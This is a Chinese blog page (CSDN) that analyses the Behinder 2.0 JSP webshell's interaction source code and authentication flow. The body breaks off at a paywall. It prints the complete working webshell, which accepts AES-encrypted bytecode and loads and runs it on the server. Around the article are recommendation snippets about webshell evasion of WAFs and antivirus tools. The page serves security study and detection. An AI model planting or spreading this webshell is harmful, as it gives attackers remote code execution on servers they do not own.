[Java随笔]冰蝎2.0-jsp马交互部分源码解读及其特征检测

最新推荐文章于 2025-03-04 10:34:23 发布
最新推荐文章于 2025-03-04 10:34:23 发布
阅读量3.6k 收藏 3
点赞数 8
分类专栏: 安全学习 # Java代码审计 # 我的JAVA学习之路 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/121277038
版权

文章目录

写在前面

大概是最近搞内存马有点累了,今晚顺便看看冰蝎部分源码,简简单单写篇博客休息休息,本着怕第一次看这个工具源码,怕直接看最新的容易不理解,就拿了个2.0版本看着玩吧,谁知道也太简单了:同款源码在rebeyond/Behinder

源码解读

反编译jar包后,其核心代码在net.rebeyond.behinder

Jsp马交互部分源码解读

直接丢出来源码,挺简单的,首先是一个继承ClassLoader的U类,一看defineClass就知道是加载字节码,没得说接下来看下面部分,get请求传入一个pass参数,随机生成一串神秘字符放到sessin里面,
如果没有get传入pass,用post写一串神秘字符,后面从session中取出密钥然后先base64解码再aes解密恢复字节码并加载

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %>
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }

        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
%><%
    if (request.getParameter("pass") != null) {
        String k = ("" + UUID.randomUUID()).replace("-", "").substring(16);
        session.putValue("u", k);
        out.print(k);
        return;
    }
    Cipher c = Cipher.getInstance("AES");
    c.init(2, new SecretKeySpec((session.getValue("u") + "").getBytes(), "AES"));
    new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
%>

认证流程

借一张网图来说明下认证流程
在这里插入图片描述
Behinder.jar!\net\rebeyond\behinder\ui\BasicInfoUtils.class下面的getBasicInfo看起来就是重点去关注的东西

最低0.47元/天 解锁文章
冰蝎源码分析
糖小喵
06-23 3492
冰蝎的原理为上传一个class字节码,通过调用classloader的defineClass方法,将class字节码,转换为Class。实例化上传的这个类,通过equal方法传递PageContext。 反编译Behinder.jar包,其核心代码在net.rebeyond.behinder包内 core包 冰蝎的主要逻辑代码。 Crypt.java和Decrypt.java 涉及到server端语言的加密解密 Params.java 调用不同语言的payload,返回其字节序列 如果攻击者
冰蝎4.0jsp浅析
Dokii_i的博客
01-16 3989
这里简单学习一下冰蝎是怎么运行的,如何通过加密解密来绕过一些常见的waf设备在看完了冰蝎是怎么连接之后,对于冰蝎的工作原理也有了一定的理解,本地和服务器端都做加密和解密的操作,以此来绕过流量检测设备以及一些waf,而且通过动态的加载class字节码,也可以绕过一些普通的webshell查杀设备,后续的一些绕过,可以在加密方式以及特征值的修改上入手。
三条命令查杀冰蝎、哥斯拉内存
最新发布
2401_85280228的博客
03-04 1136
首先我们了解一下内存注入的方法,有两种注入内存的方式:1、动态注入组件2、通过Instrument修改内存class内存姿势多种多样,内存检测方法同样百花齐放。从上面的分析来说可以总结为“80万对60万,优势在我”是攻方,比如通过三条命令发现内存,发现的只是已有的特征,攻方也可以修改这些特征,所以还需要另辟蹊径。笔者找到一个在实验环境表现不错的第二个新方法,等实践不错后再分享出来。
[JAVA安全webshell]冰蝎jsp分析
热门推荐
GX233的博客
05-03 1万+
冰蝎JSPwebshell
python与机械结合_python - 将RASA与Python和Flask结合使用的聊天机器人 - 堆栈内存溢出...
weixin_39737947的博客
11-26 226
我正在尝试使用RASA学习和创建聊天机器人,该聊天机器人必须将cmdline的输入传递给显示为Flask API的Python数据帧,并获取响应。所有零碎的部分都可以正常工作,但是当我缝合在一起时,无法将输入参数从RASA cmdline传递给Pandas。这是到目前为止我所做的总体摘要:创建了一个熊猫数据框,并将其公开为Flask API。能够手动点击它并在浏览器中查看输出。将Flask API...
java aes加密_冰蝎动态二进制加密WebShell特征分析
weixin_39716971的博客
12-01 506
概述冰蝎一款新型加密网站管理客户端,在实际的渗透测试过程中有非常不错的效果,能绕过目前市场上的大部分WAF、探针设备。本文将通过在虚拟环境中使用冰蝎,通过wireshark抓取冰蝎通信流量,结合平时在授权渗透中使用冰蝎经验分析并总结特征。版本介绍目前冰蝎已经迭代6个版本下载地址,从最初的v1.0版本到目前最新的版本v2.0.1,其中v1.0版本可以从此处下载到。冰蝎最初的版本对于环境的...
JSPMVC框架:Java Web应用MVC设计模式实现
3. "java项目源码之基于jsp+servlet+javaBean实现MVC_jspmvc的实现" - 这个文件应该是包含了实际的源代码,是整个文件集合中的关键部分。用户可以在此文件中找到JSPMVC框架实现的详细代码,包括各个层次的具体实现,...
幼儿园家园共育平台设计实现——基于Java技术
JavaWeb的开发工具包括JSP、Servlet、JavaBean、EJB等技术,能够实现数据交互和服务器端的业务逻辑处理。六年特雷利JIDEA是一款集成开发环境,支持各种Java框架,为Java开发者提供高效、便捷的开发体验。 二、...
生鲜超市管理系统设计实现 - SpringBoot全套源码和文档
- Tomcat:一个开源的Servlet容器,用于部署运行Java Servlet和JSP页面的应用。 - MySQL:一种流行的关系型数据库管理系统,用于存储和管理超市的商品、用户、订单等数据。 - MyBatis-Plus:一个MyBatis的增强工具,...
JavaWeb个人求职简历网站源码完整版
资源摘要信息: "个人简历求职网站源码JavaWeb项目.zip" 本资源提供了一个基于Java Web技术栈实现的个人简历求职网站源码包。这个项目的目标用户为寻求在互联网上展示个人简历、发表随笔文章、以及与他人进行交流的...
过d盾 jsp webshell+冰蝎免杀探讨
goddemon
07-19 2991
jsp免杀的思路其实一般最常用的就是反射和类加载问题+反转问题就能bypasswebshell的查杀了当然现在的有些厂商直接强标识这种就要el去绕咯。
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
Behinder-Source:Shell经理Behinder的源代码。冰蝎源码,反编译,当前版本3.0 Beta6,支持内存注入
03-23
关于 感谢原作者的技术分享和实践 ,当前反编译版本为Beta6 声明 本项目预测学习,请勿用于非法用途! 测试环境 Win10 + JDK1.8 + IDEA java内存:tomcat7-9,websphere 12.2.1.3.0,wildfly17、21,websphere 20.0.0.12 Liberty 更新 解决连接weblogic时,返回包开头有两个换行,导致一系列问题 添加多种java环境下(tomcat,weblogic,wildfly,websphere),多种内存冰蝎,reGeorg)的支持 添加shell生成菜单 网站文件zip压缩功能(jsp,php,aspx) 启用修改文件可行性功能(jsp,php,aspx) 添加.Net环境下aspx内存的支持 添加壳引入导出功能 php下绕过open_basedir,代码直接用哥斯拉的 感谢
冰蝎2.0-密码123qaz.rar
10-17
冰蝎webshell,无毒,无后门,安全学习可放心使用,技术含量较低主要简单操作。为防止杀毒软件误杀,已设置密码123qaz
冰蝎-v1.0-master.zip
07-16
冰蝎-v1.0-master.zip,冰蝎过狗无后门
32_behinder(冰蝎)
qq_45301512的博客
02-04 2785
有时候这个jd-gui工具无法打开文件,我们可以放一些其它的文件,例如我随便找的一个ArcTest.class文件,只要打开这个,agent.class也可以查看。防检测功能未生效,这里可能是软件功能没制作好,或者可能是只能防止部分软件检测,而恰好findshell不能防。或者停止服务器,再使用jps命令,对比发现少了哪个PID,快速判断目标JVM的PID。点击注入内存之后,注入类型选择agent,路径点击默认的,然后修改文件名。保存之后,点击上方的生成服务端,会自动弹出shell.jsp存放的文件夹。
【原创】利用动态二进制加密实现新型一句话木Java
weixin_34364071的博客
05-24 1213
概述 本系列文章重写了java.net、php三个版本的一句话木,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。 本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是: 利用动态二进制加密实现新型一句话木Java篇 利用动态二进制加密实现新型一句话木.net篇 利用动态二进制加密实现新型...
冰蝎shell.jsp对jdk8编码包BASE64Decoder的改动
sin_404的博客
08-28 1522
编码包 从JKD 9开始rt.jar包已废除,从JDK 1.8开始使用java.util.Base64.Decoder <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*" %> <%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值